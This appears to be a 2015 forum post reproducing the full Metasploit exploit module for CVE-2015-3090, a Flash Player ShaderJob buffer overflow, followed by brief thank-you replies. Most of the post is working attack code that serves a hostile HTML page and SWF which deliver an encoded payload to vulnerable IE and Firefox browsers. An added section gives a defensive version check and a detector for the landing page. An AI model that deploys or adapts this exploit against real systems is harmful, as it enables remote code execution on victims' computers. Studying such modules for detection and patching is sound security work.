Adobe Flash Player ShaderJob Buffer Overflow Vulnerability

Posted 2015-6-20 09:47:28
CVE-2015-3090
Description:
This Metasploit module exploits a buffer overflow vulnerability related to the ShaderJob workings on Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the same Bitmap object as src and destination of the ShaderJob. By modifying the "width" attribute of the ShaderJob after starting the job, it is possible to create a buffer overflow condition where the size of the destination buffer and the length of the copy are controlled.

Code:
    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
     
    require 'msf/core'
     
    class Metasploit3 < Msf::Exploit::Remote
      Rank = GreatRanking
     
      include Msf::Exploit::Remote::BrowserExploitServer
     
      def initialize(info={})
        super(update_info(info,
          'Name'                => 'Adobe Flash Player ShaderJob Buffer Overflow',
          'Description'         => %q{
            This module exploits a buffer overflow vulnerability related to the ShaderJob workings on
            Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the
            same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute
            of the ShaderJob after starting the job it's possible to create a buffer overflow condition
            where the size of the destination buffer and the length of the copy are controlled. This
            module has been tested successfully on:
            * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.
            * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.
            * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.
            * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.
          },
          'License'             => MSF_LICENSE,
          'Author'              =>
            [
              'Chris Evans', # Vulnerability discovery
              'Unknown', # Exploit in the wild
              'juan vazquez' # msf module
            ],
          'References'          =>
            [
              ['CVE', '2015-3090'],
              ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],
              ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],
              ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],
              ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']
            ],
          'Payload'             =>
            {
              'DisableNops' => true
            },
          'Platform'            => ['win', 'linux'],
          'Arch'                => [ARCH_X86],
          'BrowserRequirements' =>
            {
              :source  => /script|headers/i,
              :arch    => ARCH_X86,
              :os_name => lambda do |os|
                os =~ OperatingSystems::Match::LINUX ||
                  os =~ OperatingSystems::Match::WINDOWS_7 ||
                  os =~ OperatingSystems::Match::WINDOWS_81
              end,
              :ua_name => lambda do |ua|
                case target.name
                when 'Windows'
                  return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
                when 'Linux'
                  return true if ua == Msf::HttpClients::FF
                end
     
                false
              end,
              :flash   => lambda do |ver|
                case target.name
                when 'Windows'
                  return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')
                when 'Linux'
                  return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')
                end
     
                false
              end
            },
          'Targets'             =>
            [
              [ 'Windows',
                {
                  'Platform' => 'win'
                }
              ],
              [ 'Linux',
                {
                  'Platform' => 'linux'
                }
              ]
            ],
          'Privileged'          => false,
          'DisclosureDate'      => 'May 12 2015',
          'DefaultTarget'       => 0))
      end
     
      def exploit
        @swf = create_swf
     
        super
      end
     
      def on_request_exploit(cli, request, target_info)
        print_status("Request: #{request.uri}")
     
        if request.uri =~ /\.swf$/
          print_status('Sending SWF...')
          send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
          return
        end
     
        print_status('Sending HTML...')
        send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
      end
     
      def exploit_template(cli, target_info)
        swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
        target_payload = get_payload(cli, target_info)
        b64_payload = Rex::Text.encode_base64(target_payload)
        os_name = target_info[:os_name]
     
        if target.name =~ /Windows/
          platform_id = 'win'
        elsif target.name =~ /Linux/
          platform_id = 'linux'
        end
     
        html_template = %Q|<html>
        <body>
        <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
        <param name="movie" value="<%=swf_random%>" />
        <param name="allowScriptAccess" value="always" />
        <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
        <param name="Play" value="true" />
        <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
        </object>
        </body>
        </html>
        |
     
        return html_template, binding()
      end
     
      def create_swf
        path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')
        swf = ::File.open(path, 'rb') { |f| f.read }
     
        swf
      end
    end
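
As an added defender-side example (not part of the original post or of the Metasploit module itself): the version gate from the module's BrowserRequirements :flash lambda rewritten as a stand-alone check, plus a matcher for the FlashVars pattern (sh=, pl=, os= together with allowScriptAccess="always") of the landing page the module serves. The function names and SAMPLE_HTML are assumptions of this example, and the sample is constructed with a placeholder in place of a payload.

```ruby
# Affected-version rule mirrored from the module's BrowserRequirements :flash lambda:
# Windows 17.x up to 17.0.0.169, Linux 11.x up to 11.2.202.457.
AFFECTED = {
  'win'   => { branch: /\A17\./, last_vulnerable: Gem::Version.new('17.0.0.169') },
  'linux' => { branch: /\A11\./, last_vulnerable: Gem::Version.new('11.2.202.457') }
}.freeze

# True when a Flash Player build on the given platform is one the module targets.
# Other branches and unknown platforms return false, exactly like the lambda.
def flash_vulnerable?(platform, version)
  rule = AFFECTED[platform]
  return false unless rule && version =~ rule[:branch]
  Gem::Version.new(version) <= rule[:last_vulnerable]
rescue ArgumentError
  false # malformed version string
end

# Landing-page indicator: a Flash object/embed with allowScriptAccess="always" whose
# FlashVars carry sh= (base64 payload), pl= (platform) and os=. Returns the parsed
# FlashVars hash for a match, nil otherwise.
def exploit_page_flashvars(html)
  return nil unless html =~ /allowScriptAccess="always"/i
  m = html.match(/FlashVars="([^"]*)"/i)
  return nil unless m
  vars = m[1].split('&').map { |kv| k, v = kv.split('=', 2); [k, v.to_s] }.to_h
  %w[sh pl os].all? { |key| vars.key?(key) } ? vars : nil
end

# Constructed sample, not captured traffic: the shape of the module's HTML template
# with a placeholder ("QUFBQQ==" is base64 of "AAAA") in place of a payload.
SAMPLE_HTML = <<~HTML
  <embed type="application/x-shockwave-flash" width="1" height="1" src="abcd.swf" allowScriptAccess="always" FlashVars="sh=QUFBQQ==&pl=win&os=Windows 7" Play="true"/>
HTML

if __FILE__ == $0
  puts flash_vulnerable?('win', '17.0.0.169')  # true: last build the module targets
  puts flash_vulnerable?('win', '17.0.0.188')  # false: newer than the gate
  p exploit_page_flashvars(SAMPLE_HTML)
end
```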

Posted 2015-6-20 10:35:23 from mobile
Can't understand it..

Posted 2015-6-20 11:14:15
Which versions are affected?

Posted 2015-6-27 04:40:20
Support the Honker Union of China (ihonker.org)

Posted 2015-6-27 14:41:40
Keep it up! Take down 冰儿 and 酒仙!

Posted 2015-6-27 15:42:50
Thanks to the OP for sharing~

Posted 2015-6-27 20:33:56

Posted 2015-6-27 23:47:06
Thanks to the OP for sharing~

Posted 2015-6-28 15:10:27
Support, this looks good!

Posted 2015-6-28 21:39:36
